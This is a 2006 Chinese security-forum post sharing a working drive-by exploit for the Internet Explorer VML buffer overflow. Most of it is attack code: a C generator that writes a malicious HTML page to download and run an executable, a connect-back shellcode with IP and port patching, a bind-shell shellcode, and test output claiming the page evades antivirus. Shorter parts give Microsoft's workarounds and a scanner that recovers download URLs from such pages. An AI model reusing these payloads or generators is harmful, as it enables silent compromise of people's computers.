
Internet Explorer VML Buffer Overflow Download Exec Exploit (0day)

2006-09-22 21:33
 [Original] Another wild horse: Internet Explorer VML Buffer Overflow Download Exec Exploit

Source: EvilOctal Security Team (www.eviloctal.com)

The version modified by gyzy is the recommended one to use first:
http://forum.eviloctal.com/read-htm-tid-24858.html

————————————————————————————————————

Source: EvilOctal Security Team (www.eviloctal.com)
Author: gyzy

  All the code is modified from NOP's template; my thanks to him. To make research easier I wrote a generator, which everyone is welcome to download and test. The code NOP published on milw0rm.com has a small problem: after filling in my own shellcode and changing the first byte to \xCC, I found that of the three consecutive \xFF bytes in the shellcode's decoder, the last two get corrupted, the same as with the old Serv-U overflow, so I added a few fix-up bytes at the head:
  __asm{
    add byte ptr [esp+0x2E],0xC0   ; 80 44 24 2E C0
    add byte ptr [esp+0x2F],0xFF   ; 80 44 24 2F FF
  }
Re-tested: success. Test environment: Win2000 Professional SP4 + IE5.0



  The code is also pasted here:

————————————————————————————————————

A new critical vulnerability with no patch was published today!
The flaw is in the Windows VML component (used to render vector graphics in IE), and no patch exists for it at present. Exploit code has already been released and it is very easy to use. The most likely attack is a web page carrying a trojan: once a user visits the page, the attacker's trojan or virus is installed automatically, and the user receives no warning at all.
In short, for ordinary XP users, the remedy is as follows. There is no patch yet; until Microsoft releases one, we recommend at least one of the following measures to protect your system:
1. Unregister vgx.dll: open the Start menu, choose Run, and enter the command below:
regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
Then click OK, and click OK again in the pop-up that follows.
Once Microsoft releases the patch, to re-register the DLL run the following command the same way:
regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
2. Where possible, use a browser that is not based on the IE engine, such as Firefox or Opera.
3. Keep an eye on Microsoft's latest patch announcements.

Affected systems
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 and Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition
Microsoft Windows Server 2003 x64 Edition

Workarounds from Microsoft's site
Disable VML support in IE

Microsoft Security Advisory (925568) suggests the following techniques to disable VML support in IE:

Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1
Modify the Access Control List on Vgx.dll to be more restrictive
Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone
(Microsoft shipped the actual fix on 26 September 2006 as security bulletin MS06-055.)

Test output:

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3
Windows VML Download Exec Exploit
Code by nop nop#xsec.org, Welcome to http://www.xsec.org

Usage: 3 <URL> [htmlfile]

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3 http://127.0.0.1/test.exe 1.htm
[+] download url:http://127.0.0.1/test.exe
[+] exploit file:1.htm
[+] buff size 287 bytes
[+] exploit write to 1.htm success!

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>

The generated 1.htm is not currently detected by antivirus.

On Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the /GS (Buffer Security Check) flag, making exploitation more difficult.
Exploiting this on Windows XP SP2 is a bit harder, mainly because of the shellcode: some shellcode fails when run on Windows XP SP2. Could someone test whether the code below runs on Windows XP SP2? If it does not, the shellcode will need to be modified.

According to the tests by several people below, this vulnerability is confirmed exploitable on Windows 2000.

The code is modified from nop's; I'll just put this shellcode here on its own.
#include <string.h>
#include <winsock2.h>   // htons(), inet_addr()

#define   g_ip     "127.0.0.1"
#define   g_port     1981
//don't change the offset
#define   ip_offset   92
#define   port_offset   99
//shellcode default connect back to 127.0.0.1:1981
unsigned char sc_connect_back_for_all_ver[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86\x91\xee\xee\xef\x86\xec\xee\xee\xdb"
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\x be\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

  // Patch the target in, XORed with 0xee like the rest of the body, then copy
  // the whole payload into sc[]. sc[] must be able to hold all 275 bytes (the
  // 195-byte sc[] in nop's vml.c below is too small for this payload), and
  // memcpy is used rather than strcpy so that an encoded byte of 0x00 cannot
  // truncate the copy.
  u_short port = htons(g_port)^(u_short)0xeeee;
  u_long  ip   = inet_addr(g_ip)^0xeeeeeeee;
  memcpy(&sc_connect_back_for_all_ver[port_offset], &port, 2);
  memcpy(&sc_connect_back_for_all_ver[ip_offset], &ip, 4);
  memcpy(sc, sc_connect_back_for_all_ver, sizeof(sc_connect_back_for_all_ver));
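A check for the "don't change the offset" rule above, added here as example code (it is not part of gyzy's or nop's tools). Because the body of sc_connect_back_for_all_ver is XORed with 0xee, decoding the bytes at ip_offset and port_offset must give the target IPv4 address and port in network byte order: read_target() prints what the template currently points at, and patch_target() rewrites it the way the snippet's two memcpy() calls do, but refuses a target whose encoded form would contain a 0x00 byte, since a strcpy() into sc[] would stop there. The shellcode bytes are copied from the array above; byte order is handled by hand so no winsock header is needed, and 10.0.0.5:1981 in main() is an assumed test target.

```c
/* cb_offsets.c: added example, not part of gyzy's or nop's tools.  Checks the
 * "don't change the offset" rule: the body of the connect-back shellcode is
 * XORed with 0xee, so decoding the bytes at ip_offset/port_offset must give the
 * target IPv4 address and port in network byte order.  Byte order is done by
 * hand, so no winsock header is needed.  10.0.0.5:1981 is an assumed target. */
#include <stdio.h>
#include <string.h>

#define IP_OFFSET   92
#define PORT_OFFSET 99
#define XOR_KEY     0xee

/* Same bytes as sc_connect_back_for_all_ver[] above: a 21-byte decoder, then
 * 254 bytes XORed with 0xee. */
unsigned char sc_connect_back[] =
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86\x91\xee\xee\xef\x86\xec\xee\xee\xdb"
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

/* Decode the embedded target: dotted IPv4 into ip_out, port returned in host
 * order, or -1 if the buffer is too short to hold the offsets. */
int read_target(const unsigned char *sc, size_t len, char *ip_out, size_t ip_len)
{
    unsigned char b[6];
    int i;
    if (len < PORT_OFFSET + 2) return -1;
    for (i = 0; i < 4; i++) b[i] = sc[IP_OFFSET + i] ^ XOR_KEY;
    for (i = 0; i < 2; i++) b[4 + i] = sc[PORT_OFFSET + i] ^ XOR_KEY;
    snprintf(ip_out, ip_len, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);
    return (b[4] << 8) | b[5];                 /* network order -> host order */
}

/* Write a new target the way the snippet's two memcpy() calls do: XOR the
 * network-order bytes with 0xee at the fixed offsets.  Returns 0, or -1 without
 * touching sc if any patched byte would be 0x00 (strcpy into sc[] stops there). */
int patch_target(unsigned char *sc, size_t len, const unsigned char ip[4], unsigned port)
{
    unsigned char enc[6];
    int i;
    if (len < PORT_OFFSET + 2 || port > 0xffff) return -1;
    for (i = 0; i < 4; i++) enc[i] = ip[i] ^ XOR_KEY;
    enc[4] = (unsigned char)((port >> 8) ^ XOR_KEY);
    enc[5] = (unsigned char)((port & 0xff) ^ XOR_KEY);
    for (i = 0; i < 6; i++)
        if (enc[i] == 0) return -1;
    memcpy(sc + IP_OFFSET, enc, 4);
    memcpy(sc + PORT_OFFSET, enc + 4, 2);
    return 0;
}

int main(void)
{
    char ip[16];
    unsigned char target[4] = { 10, 0, 0, 5 };
    size_t len = sizeof(sc_connect_back) - 1;
    int port = read_target(sc_connect_back, len, ip, sizeof ip);
    printf("template connects back to %s:%d\n", ip, port);
    if (patch_target(sc_connect_back, len, target, 1981) != 0) return 1;
    port = read_target(sc_connect_back, len, ip, sizeof ip);
    printf("patched to %s:%d\n", ip, port);
    return 0;
}
```

Run it again after any edit to the decoder or the offsets: if read_target() no longer prints an address you recognise before patching, the offsets are wrong and the patched payload would connect to garbage.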

CODE:

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Compile : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Note: 0x7Ffa4512 works on Chinese 2k/xp/2k3 alike and is the recommended
// value, unless you specifically want to test against Win2000.

// Search Shellcode: scans up from esp for the "n00p" marker, then walks back
// XOR-decoding each byte with 0xee until it reaches "noop", and calls the
// decoded buffer that sits between the two markers (dcstart/dcend below).
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// Regarding the shellcode problem some people mention below, I am considering
// swapping in a different shellcode. A few more shellcodes are given here for testing.
  //shellcode: opens TCP port 8721
/*   "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
  "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
  "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
  "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
  "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
  "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
  "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
  "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
  "\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
  "\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
  "\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
  "\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
  "\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
  "\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
  "\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
  "\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
  "\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
  "\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
  "\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
  "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
  "\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
  "\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
  "\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
  "\x04\x31\xdb\x53\xff\xd0" */

/* Another one
The length of encoded shellcode is :418
The new encoded shellcode is:

"\xeb\x16\x5a\x4a\x33\xc9\x8b\xc1\x66\xb9\xa2\x01\x66\x8b\xc1\x80"
"\x34\x02\x99\x48\xe2\xf9\xeb\x05\xe8\xe5\xff\xff\xff"

"\x72\x8a\xcf"
"\xaa\x59\xfd\x12\xd9\xa9\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91"
"\xc7\x5a\x72\xfa\xf9\x12\xf5\xbd\xbd\x12\xdc\xa5\x12\xcd\x9c\xe1"
"\x9a\x4c\x12\xd3\x81\x12\xc3\xb9\x9a\x44\x7a\xad\xd0\x12\xad\x12"
"\x9a\x6c\xaa\x66\xaa\x59\x65\x35\x1d\x59\xed\x9e\x58\x5e\x8a\x9a"
"\x61\x72\x6d\xa2\xe5\xbd\xb1\xec\x78\x12\xc3\xbd\x9a\x44\xff\x12"
"\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a\x5c\x10\xdd\xbd\x85"
"\xf8\x5a\x34\xc9\xcb\x71\x33\x66\x66\x66\x10\x9e\x1a\x5d\x91\x1a"
"\x5e\x9d\xa2\x68\xec\x75\x5a\x72\x98\x55\xcc\x12\x75\x1a\x5d\x45"
"\x72\xcd\xaa\x59\xc9\x66\xcc\x71\x50\x5a\xf1\xed\xed\xe9\xa3\xc5"
"\xc5\xa8\xab\xae\xb7\xa9\xb7\xa9\xb7\xa8\xc5\xa8\xb7\xfc\xe1\xfc"
"\x99\x99\x99\x99\x99\x99\x99\x8b\x99\x9e\x99\xd7\x98\x95\x99\x41"
"\x97\xa4\x99\x81\x96\xa4\x99\xc1\x96\xa4\x17\xd7\x97\x75\x34\x40"
"\x9c\x57\xeb\x67\x2a\x8f\xe7\x41\x7b\xea\xbc\x29\x66\x5b\x74\x42"
"\x75\x61\xaf\x83\xb6\xe9\x72\x9b\x72\x9c\x71\x60\x66\x66\x66\xc7"
"\x18\x77\xcc\x99\x99\x99\x10\xec\x61\x18\x5f\xa9\x99\x99\x99\x71"
"\x92\x66\x66\x66\x12\x49\x14\xe4\x45\x12\x57\x1a\x58\x81\x71\xc6"
"\x66\x66\x66\x1a\x58\x9d\xc8\x21\x98\x98\xf6\xf7\x58\x61\x89\xc9"
"\xf1\xec\xeb\xf5\xf4\xcd\x66\xcc\x45\x12\x49\xc0\xc0\xc0\x71\xa6"
"\x66\x66\x66\xaa\x59\x67\x5d\xb2\x79\x10\xfc\x65\xc9\x66\xec\x65"
"\x66\xcc\x69\x9a\x5d\x12\x61\x21\x3a\x11\x0f\x08\x6e\x49\x32\x21"
"\x0e\x03\x0a\x16\x6e\x49\x32\x21\x57\x50\x48\x03\x6e\x49\x32\xaa"
"\x59\xff\x21\xe1\xfc\x32\xaa\x59\xc9\xc9\x66\xec\x65\x66\xec\x61"
"\xf3\x99\x66\xcc\x6d\x1c\x59\x96\x1c\x8c\x66\x66\x66\xaa\x50\x28"
"\xcd\xb2\x78\x12\x65\xce\xaa\x59\x6a\x33\xc6\x5f\x9e\xdd\xaa\x59"
"\x14\xee\xdd\xcf\xce\xc9\xc9\xc9\xc9\xc9\xc9\x66\xec\x65\xc9\x66"
"\xcc\x7d\x6e\x49\xc9\x66\xaf\x66\xcc\x79\x70\x7a\x67\x66\x66";
*/
//the code is test http://127.0.0.1/1.exe
//Encode=0x99 equal 153(dec)
//Use UrlMode
//The length of new encoded URL shellcode_D is:447 bytes
// The code above comes from a shellcode generator. I have not had time to write
// the complete shellcode-generation code, so the general-purpose tool is shelved
// for now; tweaking the code for your own temporary use should be no problem.
// Anyone with time is welcome to write a more complete version.

// The shellcode below is nop's original; some say it has problems, so try
// swapping in another shellcode.
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR: every two payload bytes become one UTF-16 code unit
// (low byte first), written as a decimal numeric character reference
void convert2ncr(unsigned char * buf, int size)
{
  int i=0;
  unsigned int ncr = 0;

  for(i=0; i<size; i+=2)
  {
    ncr = (buf[i+1] << 8) + buf[i];

    fprintf(fp, "&#%d;", ncr);
  }
}

int main(int argc, char **argv)
{
  unsigned char buf[1024] = {0};
  unsigned char burl[255] = {0};
  int sc_len = 0;
  int psize = 0;
  int i = 0;

  unsigned int nop = 0x4141;   // unused, kept from the original
  DWORD jmp = 0xeb06eb06;      // unused, kept from the original
  (void)nop; (void)jmp;

  if (argc < 2)
  {
    printf("Windows VML Download Exec Exploit\n");
    printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
    //printf("!!! 0Day !!! Please Keep Private!!!\n");
    printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
    exit(1);
  }

  url = argv[1];
  // the URL must start with http:// or ftp:// (the original tested with strstr,
  // which accepted the prefix anywhere in the string)
  if( (strncmp(url, "http://", 7) != 0 && strncmp(url, "ftp://", 6) != 0) ||
        strlen(url) < 10 || strlen(url) > MAXURL)
  {
    printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL);
    return 1;
  }

  printf("[+] download url:%s\n", url);

  if(argc >=3) file = argv[2];

  printf("[+] exploit file:%s\n", file);

  fp = fopen(file, "w+b");
  //fp = fopen(file, "w");
  if(!fp)
  {
    printf("[-] Open file error!\n");
    return 1;
  }

  // print html header
  fprintf(fp, "%s", header);
  fflush(fp);

  // 260 plain 'A' bytes pad the attribute before the NCR-encoded payload
  for(i=0; i<NOPSIZE; i++)
  {
    //fprintf(fp, "&#%d;", nop);
    fprintf(fp, "A");
  }

  fflush(fp);

  // print shellcode
  memset(buf, 0x90, sizeof(buf));
  //memset(buf, 0x90, NOPSIZE*2);

  // return address first, then 0x90 padding up to the search stub
  memcpy(buf, &ret, 4);
  psize = 4+8+0x10;

  memcpy(buf+psize, dc, sizeof(dc)-1);
  psize += sizeof(dc)-1;

  memcpy(buf+psize, dcstart, 4);
  psize += 4;

  sc_len = sizeof(sc)-1;
  memcpy(buf+psize, sc, sc_len);
  psize += sc_len;

  // print URL: XORed with 0xee like the shellcode, NUL terminator included,
  // so that dc's decoder loop restores it in place
  memset(burl, 0, sizeof(burl));
  strncpy(burl, url, 60);

  for(i=0; i<strlen(url)+1; i++)
  {
    burl[i] = url[i] ^ 0xee;
  }

  memcpy(buf+psize, burl, strlen(url)+1);
  psize += strlen(url)+1;

  memcpy(buf+psize, dcend, 4);
  psize += 4;

  // print NCR
  convert2ncr(buf, psize);

  printf("[+] buff size %d bytes\n", psize);

  // print html footer
  fprintf(fp, "%s", footer);
  fflush(fp);
  fclose(fp);

  printf("[+] exploit write to %s success!\n", file);
  return 0;
}
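A scanner that reverses the output of the generator above, added here as example code (it is not from the original post or xsec.org). convert2ncr() packs two payload bytes into each decimal "&#NNNNN;" reference, low byte first, because IE turns the reference into a single UTF-16 code unit; the dc[] stub scans up from esp for the "n00p" marker and XOR-decodes (0xee) backwards to "noop" before calling the result, so in the saved .htm both the shellcode and the download URL lie XORed with 0xee between those markers. The code below decodes the references, checks that layout on a constructed sample (placeholder bytes, not a payload), and recovers the URL, including the odd-length case where the generator's 0x90 padding adds a byte. The 127.0.0.1 URL is the one from the test run above; the function names are mine.

```c
/* ncr_scan.c: added example, not code from the original post or xsec.org.
 * Reverses vml.c's convert2ncr(): each "&#NNNNN;" in the v:fill method
 * attribute is one UTF-16 code unit carrying two payload bytes, low byte first.
 * dc[] scans up from esp for "n00p" and XOR-decodes (0xee) back to "noop", so
 * shellcode and download URL both sit XORed with 0xee between those markers.
 * Every sample byte below is constructed; none of it is a working payload. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define XOR_KEY 0xee

/* Mirror of convert2ncr(): two bytes per "&#NNNNN;", low byte first; an odd
 * trailing byte pairs with 0x90 like the generator's 0x90-filled buffer. */
int ncr_encode(const unsigned char *buf, size_t len, char *out, size_t outlen)
{
    size_t i, used = 0;
    for (i = 0; i < len; i += 2) {
        unsigned int hi = (i + 1 < len) ? buf[i + 1] : 0x90;
        int w = snprintf(out + used, outlen - used, "&#%u;", (hi << 8) | buf[i]);
        if (w < 0 || (size_t)w >= outlen - used) return -1;
        used += (size_t)w;
    }
    return (int)used;
}

/* Decode every decimal NCR in html back to bytes; malformed references and
 * values above 0xFFFF are skipped.  Returns bytes written, -1 if out is full. */
int ncr_decode(const char *html, unsigned char *out, size_t outlen)
{
    size_t n = 0;
    const char *p = html;
    while ((p = strstr(p, "&#")) != NULL) {
        char *end;
        unsigned long v = strtoul(p + 2, &end, 10);
        if (end == p + 2 || *end != ';' || v > 0xFFFF) { p += 2; continue; }
        if (n + 2 > outlen) return -1;
        out[n++] = (unsigned char)(v & 0xff);   /* buf[i]   */
        out[n++] = (unsigned char)(v >> 8);     /* buf[i+1] */
        p = end + 1;
    }
    return (int)n;
}

/* vml.c only accepts http:// or ftp:// URLs, so find either prefix XORed with
 * 0xee and read up to the encoded NUL (0xee).  Returns URL length or -1. */
int extract_url(const unsigned char *buf, size_t len, char *url, size_t urllen)
{
    static const char *prefixes[] = { "http://", "ftp://" };
    size_t k, i, j;
    for (k = 0; k < 2; k++) {
        size_t plen = strlen(prefixes[k]);
        for (j = 0; j + plen <= len; j++) {
            for (i = 0; i < plen && (buf[j + i] ^ XOR_KEY) == (unsigned char)prefixes[k][i]; i++)
                ;
            if (i < plen) continue;                       /* no prefix at j */
            for (i = 0; j + i < len && i + 1 < urllen && (buf[j + i] ^ XOR_KEY) != 0; i++)
                url[i] = (char)(buf[j + i] ^ XOR_KEY);
            url[i] = '\0';
            return (int)i;
        }
    }
    return -1;
}

/* Round trip on a constructed sample laid out like vml.c's buffer (ret, "noop",
 * placeholder shellcode, XORed URL + NUL, "n00p"): encode as the generator
 * would, decode as a scanner would (an odd-length sample gains one 0x90 pad
 * byte) and recover the URL.  Returns decoded byte count, -1 on any mismatch. */
int scan_sample(const char *dl_url, char *url, size_t urllen)
{
    static const unsigned char ret[4] = { 0xDD, 0xCC, 0x00, 0x78 };   /* 0x7800CCDD, LE */
    static const unsigned char fake_sc[6] = { 0x90, 0x90, 0x33, 0xC0, 0xFF, 0xE4 };
    unsigned char raw[256], dec[256];
    char ncr[2048], html[2200];
    size_t n = 0, i, ulen = strlen(dl_url) + 1;                        /* URL plus NUL */
    int dn;
    if (ulen > 64) return -1;
    memcpy(raw + n, ret, 4);                  n += 4;
    memcpy(raw + n, "noop", 4);               n += 4;
    memcpy(raw + n, fake_sc, sizeof fake_sc); n += sizeof fake_sc;
    for (i = 0; i < ulen; i++) raw[n++] = (unsigned char)dl_url[i] ^ XOR_KEY;
    memcpy(raw + n, "n00p", 4);               n += 4;
    if (ncr_encode(raw, n, ncr, sizeof ncr) < 0) return -1;
    snprintf(html, sizeof html, "<v:fill method=\"%s\"/>", ncr);
    dn = ncr_decode(html, dec, sizeof dec);
    if (dn < (int)n || memcmp(raw, dec, n) != 0) return -1;
    return extract_url(dec, (size_t)dn, url, urllen) < 0 ? -1 : dn;
}

int main(void)
{
    char url[128] = "";
    int n = scan_sample("http://127.0.0.1/test.exe", url, sizeof url);
    printf("decoded %d payload bytes, download URL: %s\n", n, url);
    return n > 0 ? 0 : 1;
}
```

To triage a captured page, feed the file's contents to ncr_decode() and the result to extract_url(): it reports which URL the page would fetch without ever opening it in IE.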

CODE:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include "resource.h"   // IDD_DIALOG1 / IDC_EDIT1 from the dialog resource

FILE *fp = NULL;
HWND hdlg;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);

/* Search Shellcode
\x80\x44\x24\x1A\xC0
\x80\x44\x24\x1B\xFF
*/

// Fix-up bytes (add byte ptr [esp+0x2E],0xC0 / add byte ptr [esp+0x2F],0xFF),
